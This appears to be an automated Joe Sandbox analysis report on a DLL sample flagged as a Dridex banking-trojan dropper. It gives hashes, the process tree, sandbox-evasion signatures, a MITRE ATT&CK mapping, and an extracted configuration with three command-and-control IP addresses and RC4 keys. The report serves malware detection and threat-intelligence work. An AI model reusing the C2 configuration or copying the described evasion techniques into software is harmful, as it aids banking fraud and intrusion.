Loading ...

Play interactive tourEdit tour

Analysis Report IHUVPJ4hXu

Overview

General Information

Sample Name:IHUVPJ4hXu (renamed file extension from none to dll)
Analysis ID:392885
MD5:5b10d906d4ad48a9910a8cc551b2e697
SHA1:9995dadc015c2003cdfe34c081a5f185aadb6263
SHA256:61f03287190b9ce1e91fab24eddc302f411813ac49230d2e99335952eb3addc0
Tags:40111Dridex
Infos:

Most interesting Screenshot:

Detection

Dridex Dropper
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Dridex dropper found
Found malware configuration
Yara detected Dridex unpacked file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6080 cmdline: loaddll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5688 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5900 cmdline: rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6524 cmdline: rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',ReadLogRecord MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 6600 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6080 -s 424 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000006.00000002.494855843.0000000073221000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.rundll32.exe.73220000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        2.2.rundll32.exe.73220000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 6.2.rundll32.exe.73220000.3.unpackMalware Configuration Extractor: Dridex {"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}
          Machine Learning detection for sampleShow sources
          Source: IHUVPJ4hXu.dllJoe Sandbox ML: detected
          Source: 2.2.rundll32.exe.d80000.2.unpackAvira: Label: TR/ATRAPS.Gen2
          Source: 6.2.rundll32.exe.ee0000.2.unpackAvira: Label: TR/ATRAPS.Gen2
          Source: 0.2.loaddll32.exe.1180000.0.unpackAvira: Label: TR/ATRAPS.Gen2
          Source: IHUVPJ4hXu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Source: IHUVPJ4hXu.dllStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: opengl32.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.314520251.00000000051BB000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: wgdi32full.pdbk source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.309242515.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.375547176.000000004B280000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: glu32.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.309242515.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.375547176.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000009.00000002.329300103.0000000001032000.00000004.00000010.sdmp
          Source: Binary string: fffp4.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp, IHUVPJ4hXu.dll
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.320115959.0000000005550000.00000004.00000040.sdmp
          Source: Binary string: opengl32.pdb. source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.320115959.0000000005550000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdbv source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.320115959.0000000005550000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdbd source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorIPs: 94.247.168.64:443
          Source: Malware configuration extractorIPs: 159.203.93.122:8172
          Source: Malware configuration extractorIPs: 50.116.27.97:2303
          Source: Joe Sandbox ViewIP Address: 159.203.93.122 159.203.93.122
          Source: Joe Sandbox ViewIP Address: 50.116.27.97 50.116.27.97
          Source: Joe Sandbox ViewIP Address: 94.247.168.64 94.247.168.64
          Source: Joe Sandbox ViewASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
          Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
          Source: Joe Sandbox ViewASN Name: GLESYS-ASSE GLESYS-ASSE
          Source: IHUVPJ4hXu.dllString found in binary or memory: http://ansicon.adoxa.vze.com/6

          E-Banking Fraud:

          barindex
          Dridex dropper foundShow sources
          Source: Initial fileSignature Results: Dridex dropper behavior
          Yara detected Dridex unpacked fileShow sources
          Source: Yara matchFile source: 00000002.00000002.496037557.0000000073221000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.494855843.0000000073221000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.rundll32.exe.73220000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.rundll32.exe.73220000.3.unpack, type: UNPACKEDPE
          Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_73232790 NtAllocateVirtualMemory,2_2_73232790
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_7323218C NtDelayExecution,2_2_7323218C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_7322BC00 NtClose,2_2_7322BC00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_732307CC2_2_732307CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_732214942_2_73221494
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_732392DC2_2_732392DC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_732291442_2_73229144
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_7322A5A42_2_7322A5A4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_732284E42_2_732284E4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_732314D82_2_732314D8
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6080 -s 424
          Source: IHUVPJ4hXu.dllBinary or memory string: OriginalFilenameANSI32.dll0 vs IHUVPJ4hXu.dll
          Source: IHUVPJ4hXu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Source: IHUVPJ4hXu.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal80.bank.troj.evad.winDLL@8/4@0/3
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6080
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2FD9.tmpJump to behavior
          Source: IHUVPJ4hXu.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',#1
          Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll'
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',#1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',#1
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',ReadLogRecord
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6080 -s 424
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',#1Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',ReadLogRecordJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',#1Jump to behavior
          Source: IHUVPJ4hXu.dllStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: IHUVPJ4hXu.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: opengl32.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.314520251.00000000051BB000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: wgdi32full.pdbk source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.309242515.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.375547176.000000004B280000.00000004.00000001.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: glu32.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.309242515.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.375547176.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000009.00000002.329300103.0000000001032000.00000004.00000010.sdmp
          Source: Binary string: fffp4.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp, IHUVPJ4hXu.dll
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.320115959.0000000005550000.00000004.00000040.sdmp
          Source: Binary string: opengl32.pdb. source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: wgdi32.pdbk source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.320115959.0000000005550000.00000004.00000040.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: msvcrt.pdbv source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000009.00000003.320089144.0000000005552000.00000004.00000040.sdmp
          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.320083135.0000000005581000.00000004.00000001.sdmp
          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.320115959.0000000005550000.00000004.00000040.sdmp
          Source: Binary string: advapi32.pdbd source: WerFault.exe, 00000009.00000003.320124426.0000000005558000.00000004.00000040.sdmp
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_7322F744 push esi; mov dword ptr [esp], 00000000h2_2_7322F745
          Source: initial sampleStatic PE information: section name: .text entropy: 7.55877156847
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to delay execution (extensive OutputDebugStringW loop)Show sources
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: OutputDebugStringW count: 980
          Tries to detect sandboxes / dynamic malware analysis system (file name check)Show sources
          Source: C:\Windows\System32\loaddll32.exeSection loaded: \KnownDlls32\testapp.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: \KnownDlls32\testapp.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: \KnownDlls32\testapp.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 598Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 382Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_732307CC GetTokenInformation,GetSystemInfo,GetTokenInformation,2_2_732307CC
          Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
          Source: WerFault.exe, 00000009.00000002.330319119.00000000056E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: WerFault.exe, 00000009.00000002.330319119.00000000056E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: WerFault.exe, 00000009.00000002.330319119.00000000056E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: WerFault.exe, 00000009.00000002.330319119.00000000056E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_73226DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,2_2_73226DC8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_73233060 RtlAddVectoredExceptionHandler,2_2_73233060
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\IHUVPJ4hXu.dll',#1Jump to behavior
          Source: rundll32.exe, 00000002.00000002.494814052.0000000003370000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.494197828.0000000003300000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: rundll32.exe, 00000002.00000002.494814052.0000000003370000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.494197828.0000000003300000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: rundll32.exe, 00000002.00000002.494814052.0000000003370000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.494197828.0000000003300000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: rundll32.exe, 00000002.00000002.494814052.0000000003370000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.494197828.0000000003300000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: rundll32.exe, 00000002.00000002.494814052.0000000003370000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.494197828.0000000003300000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,2_2_73226DC8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_73226DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,2_2_73226DC8
          Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Virtualization/Sandbox Evasion21OS Credential DumpingSecurity Software Discovery111Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerVirtualization/Sandbox Evasion21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rundll321NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing3LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          IHUVPJ4hXu.dll100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.rundll32.exe.d80000.2.unpack100%AviraTR/ATRAPS.Gen2Download File
          6.2.rundll32.exe.ee0000.2.unpack100%AviraTR/ATRAPS.Gen2Download File
          0.2.loaddll32.exe.1180000.0.unpack100%AviraTR/ATRAPS.Gen2Download File

          Domains

          No Antivirus matches

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://ansicon.adoxa.vze.com/6IHUVPJ4hXu.dllfalse
            high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            159.203.93.122
            unknownUnited States
            14061DIGITALOCEAN-ASNUStrue
            50.116.27.97
            unknownUnited States
            63949LINODE-APLinodeLLCUStrue
            94.247.168.64
            unknownSweden
            43948GLESYS-ASSEtrue

            General Information

            Joe Sandbox Version:31.0.0 Emerald
            Analysis ID:392885
            Start date:19.04.2021
            Start time:23:39:43
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 6m 48s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:IHUVPJ4hXu (renamed file extension from none to dll)
            Cookbook file name:default.jbs
